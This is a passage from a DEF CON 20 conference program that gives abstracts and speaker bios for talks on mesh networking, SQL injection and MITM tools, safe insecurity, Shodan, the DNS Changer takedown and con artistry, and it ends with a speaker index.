detailed report all aspects of how the attack was done, level of complexity and so on. This is something we
believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make
them make it better (or possibly use a different part).
Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future
Richard Thieme ThiemeWorks
Thieme's keynote at DEF CON 4 for a few hundred people was "Hacking as Practice for
Trans-planetary Life in the 21st Century." Mudge recently said, "Some of us knew what you meant, and
some of us thought you were nuts." That's likely to be the response to this talk too. Thieme addresses
what he said 17 cons ago, why it was true, and illuminates some likely futures for hacking and hackers,
anonymous 2.0.1, and the gray space of the noir world in which one is deemed a "criminal," not because
of what one does, but according to who one does it for.
Identity, in short, is destiny. More than ever, identity is a choice, modular and fluid.
Mudge was with the l0pht then, now he's with DARPA. Jeff Moss was an entrepreneurial hacker, now's he's with
Homeland Defense. Too many to name work in agencies or stateless names and nameless states, fulfilling
the vision of Thieme's first speech.
But that was then. What's likely to be next?
The more we idealize lone hacker wolves in fiction and films, the more assimilated we nevertheless become
into many Borgs, not one. Technologies determine identity, flows of information shape our souls. The
forms into which we fit - in thought, word, and deed - are who we think we are.
So most humans are flocks of birds in digital cages. Hackers however see the implications of making
the cages, create the space in which others live. So the question still is, which pill do you want?
But the matrix has morphed. It's malleable, plastic, and biological, infinitely fun to stretch into
new shapes.
The next twenty years ... the vision of "a deranged old man, wandering around the con," as someone said.
But insanity, sainthood, wisdom look the same. The long view of distance, perspective across the years,
is worth a million fast twitches. Combine rapid action and perspective, however ... turn context
into content ... use both sides of your brain ... and you'll have mastery, a wild trip, and one
hell of a good time.
Richard Thieme is an author and professional s
peaker focused on the deeper implications of technology for twenty-first century life.
He speaks professionally about the challenges posed by new technologies and the future,
how to redesign ourselves to meet these challenges, and creativity in response to radical
change. Thieme has spoken for sixteen years for the Black Hat Briefings (intelligence and
corporate security) and DEF CON, an annual computer hackers' convention.
About a decade ago, a friend at the National Security Agency suggested that he could address the
issues they discussed in a context of "ethical considerations for intelligence and security
professionals" only if he wrote fiction. "It's the only way you can tell the truth," he was
told. Three dozen published short stories and one novel-in-progress later, the result
is "Mind Games," published in 2010.
Twitter: @neuralcowboy
https://www.facebook.com/pages/Richard-Thieme/107319815723
www.thiemeworks.com,
neuralcowboy@skype,
Richard Thieme at LinkedIn
Off-Grid Communications with Android: Meshing the Mobile World
Josh "m0nk" Thomas Breaker of Things @ The MITRE Corporation
Jeff "stoker" Robble MITRE Corporation
Jeff "stoker" Robble MITRE Corporation
Before they were a team, the members of project SPAN thought it was highly
limiting to only be able to network smart phones over standard Wi-Fi or with a Cellular infrastructure.
Honestly, the SPAN team isn't a big fan of infrastructure-based networks in general. They wanted a headless,
dynamic network that allowed for resilient communications when the other infrastructure either wasn't
available or when they just didn't feel like using it. They also really liked the idea of a communication
system where there was no central router, server or other central point of sniffing of data. With
this in mind, they teamed up and created project SPAN (Smart Phone AdHoc Networks). They decided
to open source the project and to share not only the code (initial release to coincide with the
presentation) but also the whole process and idea with the community at large. The team is
annoyed that the current generation smart phone radios have the intrinsic ability to communicate
directly with one another, but hardware vendors and mobile OS frameworks don’t make it easy to
do so. Let us show you how it can be done and the fun that can be had from it.
Join the SPAN team for a deep dive into the Android network stack implementation and its limitations,
an analysis of the Wi-Fi chipsets in the current generation of smart phones and a collection of lessons
learned when writing your own network routing protocol (or 5 of them). The team will also share
a "How To" walkthrough into implementing your own Mesh network and incorporating general "Off Grid"
concepts into your next project; this will include securing your mesh from outside parties
while tunneling and bridging through the internet. The team will delve into specific Android
limitations of Ad-Hoc networking and provide workarounds and bypass mechanisms. Lastly, the team
will give an overview of the implementations and network surfaces provided by the new collection of
networking alternatives, including NFC and Wi-Fi Direct.
Josh "m0nk" Thomas is a Security researcher, mobile
phone geek, mesh networking evangelist and general breaker of things electronic. His past
projects have commonly spanned the hardware / software barrier and rarely have a UI. He's
spent the past 12 years poking at embedded systems, networks, IP stacks, AI and right-time
communication systems. A code monkey at heart, m0nk has spent the last year digging deep
into Android and iOS internals, with a major focus on both the network stack implementations
and the driver / below driver hardware interfaces. He uses IDA more frequently than Eclipse,
really just likes playing with gadgets and wants to make the world a better place. His life
dream is to ride a robot unicorn on a moonlit beach.
Twitter: @m0nk_dot
Jeff "stoker" Robble has been writing Java and Android
software for quite a while now and he's become bored pushing blinky lights to the screen. He wanted
to dig deeper into the internals of network stacks and smart phone handsets and SPAN was the
perfect opportunity. At last count, Stoker was seen carrying 14 Android devices in his backpack
and was mumbling something about Ice Cream Sandwich and WiFi Direct scalability.
Socialized Data: Using Social Media as a Cyber Mule
Thor (Hammer of God) Chief Deity, Hammer of God
I don't wear hats. But if I did, even though I'm in an underground bunker
in the dark, it would be kind of "off-whitish-grey." Like many, many of
us in this industry I don't do anything "bad" even though I can. That's
because I choose not to. I think "Freedom" is doing what you want to do -
as a corollary, I think "Liberty" is the degree of *choice* one has in
exercising their Freedom. This is the basis of my "grey" affinity.
Though my actions are "white" by choice, I get very, very concerned when I
see governmental/legislative/enforcement effort encroach upon my liberties
even though it doesn't affect me personally. For instance, I'm totally fine with
DRM and copyright laws. If you don't like the way the vendor produces
their product, don't buy it. However, when legislation like SOPA comes
along, it provides a mechanism for the government to dictate what private,
non-affiliated companies must do in order to protect property belonging to
another private company on their behalf. Thought I buy my music and
software (really) I'm vehemently opposed to such legislation, particularly
when all we have to do is edit a hosts file to bypass it. As such, I
assert than any legislator who supported/supports SOPA or similar laws is
an ignorant fucking slag.
I feel the same way about communications as it relates to monitoring,
intercepting, collection and storage outside of my control. That's why I
wrote TGP - so people could use cloud-based resources to encrypt their
communications in a way that no-one can decrypt (presumably). But I
always look for ways around encryption, and more importantly around
*detection* of any method by which I choose to communicate in a manner to
ensure it isn't intercepted, detected, or otherwise divulged to anyone.
And this finally leads us to what this talk is about. When thinking like a
"bad guy" with the goal of distributing any number of covert
communications to any number of recipients, there are a number of critical
attributes which should be present. The message should:
- Be portable and "self-sustaining.
- Be able to be propagated without the originator actually having to *own*
the message or carry it on him.
- Have the ability to control which recipients receive/can read the
message.
- Have the messages backed up and managed by a 3rd party in perpetuity.
- Be free
- Be able to be received without any privileged access to equipment or
require specialized equipment to receive.
- Be detection resistant, or even detection PROOF.
This session will be about how to go about just that. ALL of these
attributes will be satisfied, and I will illustrate how you can literally
have a "detection-proof" covert communication. I don't think I've ever
said that before, and just writing the words "detection-proof" makes me
cringe just a bit. But I've racked my brain on a way to detect what I'll
show you and I can't find a way to do it.
That will be the other cool part of this talk - we'll all brainstorm at
the end on a way to detect this. I bet you can't. :) To me, this is the
epitome of what DEF CON is about, and I hope you'll join me at this talk.
Besides, my super-hot wife will be there. Get hammered at Hammer of God!!!
Timothy Mullen is a Principal Security Architect for a worldwide, multibillion-dollar commerce platform, and is rumored to operate somewhere in the vicinity of Seattle, Washington.
Also known as "Thor," he is the founder of the "Hammer of God" security co-op group. He is a member of American Mensa, a Microsoft Certified Trainer, has Microsoft Engineer certifications in all remotely recent operating systems, and has been awarded Microsoft's "Most Valuable Professional" (MVP) award in Windows Enterprise Security four years running.
Mullen has spoken at security conferences world-wide, and has recently published Thor's Microsoft Security Bible, his latest of many books. He has delivered by-invitation presentations to organizations such as Microsoft, the US Federal Court system, the Hong Kong Police and the Geneva School of Engineering. Mullen has also been named a Distinguished Speaker by the NSA and The United States Cyber Command.
hammerofgod.com
Safes and Containers: Insecurity Design Excellence
Marc Weber Tobias Investigative Attorney and Security Specialist, Security.org
Matt Fiddler Security Specialist, Security.org
Tobias Bluzmanis Security Specialist, Security.org
Insecure designs in physical security locks, safes, and other products have consequences
in terms of security, liability, and even loss of life. Marc Weber Tobias and his colleagues Tobias Bluzmanis
and Matthew Fiddler will discuss a number of cases involving design issues that allow locks and safes to be
opened in seconds, focusing on consumer-level containers that are specified as secure for storing valuables
and weapons, and in-room hotel safes that travelers rely upon.
In one instance, the insecurity of a consumer gun safe that is sold by major retailers in the United States played
a part in the death of a three year old child who was able to gain access to a handgun that was locked in a
supposedly secure container.
The presenters will demonstrate different product designs that were represented as secure but in fact are not.
Marc Weber Tobias is an investigative attorney and security
specialist living in Sioux Falls, South Dakota. He is the principal attorney for Investigative
Law Offices, P.C. and as part of his practice represents and consults with lock manufacturers,
government agencies and corporations in the U.S. and overseas regarding the design and bypass
of locks and security systems. Marc and his associates also conduct technical fraud investigations
and deal with related legal issues. Marc has authored five police textbooks, including Locks, Safes,
and Security, which is recognized as a primary reference for law enforcement and security professionals
worldwide. The second edition, a 1400 page two- volume work, is utilized by criminal investigators,
crime labs, locksmiths and those responsible for physical security. A ten-volume multimedia edition
of his book (LSS+) is also available online.
Marc has written extensively about the security vulnerabilities of products and has appeared in numerous television
and radio interviews and news reports as well as magazine articles during the past thirty years. He is a member of
several professional organizations including the American Bar Association (ABA, American Society for Industrial
Security (ASIS), Associated Locksmiths of America (ALOA), Association of Firearms and Tool mark Examiners (AFTE),
American Polygraph Association (APA) and the American Police Polygraph Association (APPA).
Matt Fiddler is a certified and registered locksmith and Security
Professional with over 20 years of experience. Mr. Fiddler's research into lock bypass techniques have resulted
in many public and private disclosures of critical lock design flaws. Mr. Fiddler began his career as an
Intelligence Analyst with the United States Marine Corps. Since joining the commercial sector in 1992, he
has spent the last 20 years enhancing his extensive expertise in the areas of Covert Entry Tool Design,
Physical Security Consulting, Computer Forensics and Intrusion Analysis.
Tobias Bluzmanis, Born in Caracas, Venezuela, Tobias came to
the United States in 1995 and was granted citizenship in 2000. He has been a professional locksmith for
the past 20 years. Tobias is an expert in Covert Methods of Entry and has developed many unique forms of
bypass, custom tools, including a decoder for Medeco locks, which was the impetus for the
book "Open in Thirty Seconds".
Rapid Blind SQL Injection Exploitation with BBQSQL
Ben Toews Security Consultant, Neohapsis
Scott Behrens Security Consultant, Neohapsis
Scott Behrens Security Consultant, Neohapsis
Blind SQL injection can be a pain to exploit. When the available tools work they
work well, but when they don't you have to write something custom. This is time-consuming and tedious.
This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This
talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue
into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will
cover how features like evented concurrency and character frequency based searching can greatly
improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge
to begin using BBQSQL to simplify and speed up your application pentests.
Ben Toews is a Security Consultant
at Neohapsis where he specializes in application and network pentesting. Previously,
Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has
been published in HITB Magazine. Ben has a BS in Information Assurance and Security
Engineering from DePaul University.
Twitter: @mastahyeti
http://btoe.ws
Scott Behrens is currently employed as a Security Consultant at
Neohapsis and an Adjunct Professor at DePaul University. Before
Neohapsis, Scott Behrens was an Open Systems Architect for a financial
consulting firm, as well as a Network Administrator at Argonne National
Laboratories. Scott Behrens’ expertise lies in software security
assessment, network penetration testing, social engineering, security
architecture, and security research. Scott is also the co-developer of
NeoPI, a framework to aid in the detection of obfuscated malware. Scott
has also presented at Chicago B-sides and has published numerous
articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University.
Twitter: @HelloArbit
http://www.scottbehrens.com
Subterfuge: The Automated Man-in-the-Middle Attack Framework
Matthew Toussain United States Air Force
Christopher Shields United States Air Force
Christopher Shields United States Air Force
Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in.
Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as
point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials
that go across the network, and even exploiting machines through race conditions. Now walk into a corporation…
A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex
processes into a framework which provides instantaneous results. On the contrary, much of the information security
community still finds itself performing manual, complicated tasks to administer and protect their computer networks.
The purpose of this presentation is to discuss a new Man-In-The-Middle attack tool called Subterfuge. Subterfuge is a
simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently
trusting Address Resolution Protocol. It does this in a way that even a non-technical user would have the ability,
at the push of a button, to attack all machines connected to the network. Subterfuge further provides the framework
by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting,
thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security
validation tool.
Matthew M. Toussain developed the Air Force’s introductory
Cyber Warfare curriculum at the United States Air Force Academy, promoting information assurance through
a ten day, fast-paced, offense focused program. As a senior at the Academy he participates in national
and international cyber competitions with the AF Academy’s Cyber Competition Team.
Twitter: @0sm0s1z
Facebook: mtoussain
http://code.google.com/p/subterfuge/
Christopher Shields, Lieutenant in the United States Air Force,
was the first-ever Cyber Commander pioneering the United States Air Force Academy's intensive summer curriculum.
As an integral four-year member of the Academy's internationally-recognized Cyber Warfare CompetitionTeam,
he drove their 2012 Cyber Defense Exercise win, hosted by the NSA, and their second place finish at the 2012
National Collegiate Cyber Defense Competition. A Cyberspace Operations Officer, Lieutenant Shields holds a
Computer Science-Cyber Warfare degree. His growing experience and interest includes network penetration
testing, network mapping and enumeration, intrusion detection, exploitation and persistence, and security research.
Drinking From the Caffeine Firehose We Know as Shodan
Viss
Information Security Consultant, Gentleman of Fortune
Shodan is commonly known for allowing users to search for banners displayed
by a short list of services available over the internet. Shodan can quite easily be used
for searching the internet for potentially vulnerable services to exploit, but it's also
a powerful defensive posturing tool as well as the first step in aggregating wide scopes
of data for mining. Everyone knows routers, switches and servers are connected to the
internet - but what else is out there? Has anybody even looked? I suspect people stop
after the popular searches and forego what's left. Did you know there are hydrogen
fuel cells attached to the internet? Some of my findings were pretty surprising,
and these discoveries are an excellent metric for identifying how successful our
security campaigns as an industry are. It's a way to measure our success as a whole,
by scanning the entire internet.
Viss (Dan Tentler) is currently freelancing as a
Security Consultant and parachutes into various clients in southern California. During the last 5
years Dan has carried a wide breadth of clients and engagements, ranging from wireless site surveys
and penetration testing, to full blown social engineering campaigns, to lockpicking and threat &
vulnerability assessments. Dan has presented at various BarCamps, Toorcon San Diego, ToorCon Seattle,
Refresh San Diego and SDSU computer security advanced lecture classes. Come find Dan and ask him
about things, he'll talk your ear off.
Twitter: @viss
The DCWG Debriefing - How the FBI Grabbed a Bot and Saved the Internet
Paul Vixie Chairman and Founder, Internet Systems Consortium
Andrew Fried Senior Consultant, Cutter Consortium's Business Technology Strategies and Government & Public Sector Practices
In November of 2011 a multinational force of feds and wizards took down Rove Digital's
on-line infrastructure including the DNS Changer name servers. Under contract to the FBI, employees of Internet
Systems Consortium (ISC) installed "clean" replacement DNS servers to take care of a half million DNS Changer victims.
On July 9 2012 the last court order expired and we turned these name servers off, having had only mixed success in
getting the malware cleaned up. Andrew Fried and Paul Vixie of ISC will present the whole story and talk about
some of the hard lessons to be learned.
Dr. Paul Vixie is Chairman and Founder of Internet Systems Consortium.
He served as President of MAPS, PAIX and MIBH, as CTO of Abovenet/MFN, and on the board of several for-profit and
non-profit companies. He has served on the ARIN Board of Trustees since 2005, where he served as Chairman in 2008 and
2009, and is a founding member of ICANN Root Server System Advisory Committee (RSSAC) and ICANN Security and
Stability Advisory Committee (SSAC).
Vixie has been contributing to Internet protocols and UNIX systems as a
protocol designer and software architect since 1980. He is considered
the primary author and technical architect of BIND 8, and he hired many
of the people who wrote BIND 9 and the people now working on BIND 10. He
has authored or co-authored a dozen or so RFCs, mostly on DNS and
related topics, and of Sendmail: Theory and Practice (Digital Press,
1994). He earned his Ph.D. from Keio University for work related to the
Internet Domain Name System (DNS and DNSSEC).
Andrew Fried is a Senior Consultant with Cutter
Consortium's Business Technology Strategies and Government & Public Sector practices. His unique
skill set has earned him a worldwide reputation; his background includes working as a uniformed police
officer, a computer programmer and security analyst, and a Senior Special Agent with the US Department
of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge allows
him to identify large data sources that are seemingly unrelated and combine them to produce findings
that would not be otherwise identified. His passion and tenacity for identifying and stopping Internet
criminal activity has earned him the respect of leading industry experts. During his last two years
at the US Treasury, Mr. Fried was credited with identifying and mitigating over 3,000 fraudulent online
schemes. He currently works as a security researcher for a nonprofit organization involved in identifying
organized criminal enterprises responsible for fraudulent schemes, denial-of-service attacks, malware
propagation, and large-scale botnets. Mr. Fried's work routinely involves data mining and analysis of
data sets that contain hundreds of millions of records.
The Christopher Columbus Rule and DHS
Mark Weatherford
Deputy Undersecretary for Cybersecurity for the National Protection and Programs Directorate (NPPD) at the
United States Department of Homeland Security.
“Never fail to distinguish what’s new, from what’s new to you.” This
rule applies to a lot people when they think about innovation and
technology in the government. At the U.S. Department of Homeland
Security, in addition to running the National Cybersecurity and
Communication Integration Center (NCCIC), the US-CERT and the
ICS-CERT, they work daily with companies from across the globe to
share critical threat and vulnerability information. DHS also
supports and provides funding for a broad range of cutting-edge
cybersecurity research initiatives, from the development and
implementation of DNSSEC to sponsoring the use of open source
technologies and from development of new cyber forensics tools to
testing technologies that protect the nation’s industrial control
systems and critical infrastructures. This is not your grandfather’s
Buick! During this presentation Deputy Under Secretary for
Cybersecurity Mark Weatherford will talk about research and training
opportunities, the growing number of cybersecurity competitions
sponsored by DHS, and how they are always looking to hire a few good
men and women.
Mark Weatherford is the Deputy Under Secretary for Cybersecurity for
the National Protection and Programs Directorate (NPPD) at the United
Stated Department of Homeland Security. Weatherford most recently
served as the Vice President and Chief Security Officer of the North
American Electric Reliability Corporation (NERC), where he directed
the organization’s critical infrastructure and cybersecurity program.
He previously served as the Chief Information Security Officer in the
State of California’s Office of Information Security, and as Chief
Security Officer for the State of Colorado, where he helped establish
the state’s first cybersecurity program. Weatherford is a former
Naval Cryptologic Officer, where he led the Navy’s Computer Network
Defense operations and the Naval Computer Incident Response Team.
The Art Of The Con
Paul Wilson Real Hustler
The Art of the Con.
Paul Wilson is the writer and star of "The Real Hustle" and creator of "The Takedown"
on Court TV and "Scammed" on The History Channel. He is one of the world's finest
magicians and an expert on cons, scams, casino cheating and gambling sleight of hand.
He has pulled more confidence tricks than anyone in history in his efforts to
inform and protect the public.
This talk will include a live con game, cheating devices and reasons why
people will always be vulnerable.
Paul Wilson is a world renowned expert on cheating, an award
winning conjuror and magic inventor. He now works in film and television. Paul has worked as an actor, presenter, writer, producer
and director. He has created, developed and produced television shows for NBC, CBS, A&E, BBC, Court TV and Tru TV.
He has been studying sleight of hand, cheating and conjuring since he was eight years old. After
twelve years as a computer consultant, he became a professional performer and lecturer, using the
time to study film before moving into the industry.
He also produced A&E's hit show Mondo Magic , advised Criss Angel for his hit TV show, appeared on "Modern Marvels'"
casino technology episodes and is the resident cheating expert on Italian TV's "Arcana" show.
He co-created, produced and starred in Court TV's "The Takedown", a twelve episode series where Paul was challenged
to beat Casino security systems.
He went on to write and present "The Real Hustle" for the BBC. The show is now a hit in
the UK and the fifth season has finished airing. A US version was commissioned by Court TV.
Paul was also the host of VOOM’s “Ultimate Tourist Scams” and has written and presented a
one hour special for BBC ONE where he performed the impossible for members of the public.
He currently works as a professional consultant, producer and director. He occasionally performs his
one-man show "Lie. Cheat. Steal." for the public and corporate clients and
is a regular talk-show guest in the UK.
Twitter: @rpaulwilson
Improving Web Vulnerability Scanning
Dan Zulla
A new approach for web vulnerability scanning that outbids most existing scanners.
Dan Zulla contributed to various open source
vulnerability scanning projects and to the security of most international web hosting and
virtualization companies. He did vulnerability scanner development, penetration testing and
performance optimization in scaling environments for many years. Last year he built his first
security research company and sold it in less than 8 months to a larger competitor at the
age of 18.
Twitter: @zulladan
www.zulla.org
Speaker Index
A
Alex Abdo
Gen. Keith B. Alexander
Chema Alonso
Anarchy Angel
Anch (1, 2)
Chris Anderson
Brad Antoniewicz
James Arlen
atlas
B
Adam "EvilPacket" Baldwin
James Bamford
Kevin Bankston
Michael Baucom
Rod Beckstrom
Scott Behrens
Colin Beighley
William Binney
Bitweasil
Blakdayz
Matt Blaze (1, 2)
Tobias Bluzmanis
William Borskey
Rodrigo Rubira Branco
Joshua Brashars
Sergey Bratus (1, 2)
Jonathan Brossard
Dave Brown
Francis Brown
Jeff Bryner
Elie Bursztein
Linda C. Butler
C
Thomas Cannon
Mr. Leon Carroll
Alan "Avenir" Chung
Jim Christy (1, 2)
cifo
Sandy Clark
Jonathan Claudius
Gabriella Coleman
Chris Conley
Greg Conti
Michael Copplola
Joshua Corman
Ang Cui
Cutaway
Zachary Cutlip
Catherine Crump
D
Christian "quaddi" Dameff
Darkred
The Dark Tangent
Dead Addict
Robert Deaton
Dave DeSimone
Jerry Dixon
Cory Doctorow
dotAero
Nadeem Douba
Matthew Duggan
Tom "Tdweng" Dwenger
E
Peter Eckersley
Egypt
Richard J. Enbody
esden
Amir "Zenofex" Etemadieh
F
Hanni Fakhoury
Nick Farr
Zack Fasel
Karl Feinauer
Matt Fiddler
John Floren
Andy Fried (1, 2)
FX
G
Svetlana Gaivoronski
Nick Galbreath
Martin Gallo
Eva Galperin
Dennis Gamayunov
Andrew Gavin
Kenneth Geers
Robert David Graham
Joe Grand
Jennifer Granick (1, 2)
Greg
Dan Griffin
H
Mercedes Haefer
Peter Hannay
Woody Hartzog
Shawn Henry
CJ Heres
Chris Hoff
Dustin Hoffman
Marcia Hofmann (1, 2, 3)
Ryan Holeman
I
Jon Iadonisi
Alberto García Illera
J
Jameel Jaffer
Robert E. Joyce
K
Corey Kallenberg
Dan Kaminsky (1, 2)
Dave Kennedy
Andrew King
James Kirk
Toby Kohlenberg
Xeno Kovah
Mischel Kwon
L
Anthony "Darkfloyd" Lai
Eddie Lee
Jay Leiderman
Gideon Lenkey
Katy Levinson
Andrea (Drea) London
LosT
Amber Lyon
M
Tim Maletic
David Maloney
Manu "The Sur"
Dave Marcus
Rich Marshall
David Maynor
Moxie Marlinspike
David McCallum
Wesley McGrew
Charlie Miller
Alexander Minozhenko
misterj
Tony "MT" Miu
Rich Mogull
David Mortman
Raphael Mudge
N
Fergus Noble
Jason A. Novak
O
James Oakley
Gráinne O’Neil
Omega
Kurt Opsahl
Jason Ostrom
P
Bob Pan
Nicholas J. Percoco
Michael Perklin
Tom Perrine
Larry Pesce
Dan "AltF4" Petro
Christopher Pogue
Phil Polstra
Robert Portvliet
Kevin Poulsen
Priest
R
Rob Ragan
Renderman
Jim Rennie
Ryan Reynolds
Semon Rezchikov
Riley Repko
Jeff "stoker" Robble
Michael Robinson
Carlos Alberto Rodriguez
Dan Rosenberg
S
Marcus Sachs
Patrick Samy
Bruce Schneier
Sean Schulte
Jason Scott
Rebecca "bx" Shapiro
Lisa Shay
Christopher Shields
Mickey Shkatov
Charles Smith
Christopher Soghoian
Ashkan Soltani
Aditya K. Sood
Jayson E. Street
Chris "TheSuggmeister" Sumner
T
Chris Tarnovsky
Chris Taylor
Gail Thackeray
Richard Thieme
Josh "m0nk" Thomas
Thor
Trevor Timm
Marc Weber Tobias
Ben Toews
Matthew M. Toussain
Jeff "r3plicant" Tully
V
Sergio Valderrama
Viss
Paul Vixie
W
Randall Wald
Mark Weatherford (1, 2)
Dr. Linton Wells
Paul Wilson
Ben Wizner
Kelvin "Captain" Wong
Justin Wykes
Z
Zoz
Dan Zulla
Panels and Special Interest
DCG/Hackspace Panel
ACLU Panel
DEF CON 101
Meet the EFF
Meet the Fed Panel (1, 2,)
DC RECOGNIZE Awards
Panel: Making DEF CON 20
Movie Night: Code 2600
Movie Night: Reboot
Movie Night: 21
Q&A With the Men (and Women) in Black
Thursday Speakers/ DC 101
DEF CON 101
AlxRogan
DaKahuna
Flipper
Hackajar
Lockheed
LoST
Ripshy
Roamer
Siviak
Terence "tuna" Gareau
Dr. Tran